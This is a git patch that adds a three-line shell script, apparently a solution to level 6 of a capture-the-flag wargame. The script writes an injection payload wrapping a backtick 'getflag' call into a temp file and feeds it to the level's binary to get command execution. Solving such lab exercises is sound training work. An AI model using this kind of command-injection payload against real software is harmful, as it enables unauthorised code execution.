From 1bbc312011e90551c0433bdecbf1a566733841b4 Mon Sep 17 00:00:00 2001 From: "nuo.o" <49533950+nuoxoxo@users.noreply.github.com> Date: Mon, 18 Nov 2024 11:41:51 +0100 Subject: [PATCH] Create not_for_use.sh --- level06/not_for_use.sh | 3 +++ 1 file changed, 3 insertions(+) create mode 100644 level06/not_for_use.sh diff --git a/level06/not_for_use.sh b/level06/not_for_use.sh new file mode 100644 index 0000000..c85f31f --- /dev/null +++ b/level06/not_for_use.sh @@ -0,0 +1,3 @@ +rm -rf /tmp/temp +echo '[x ${`getflag`}]' > /tmp/tmp +./level06 /tmp/tmp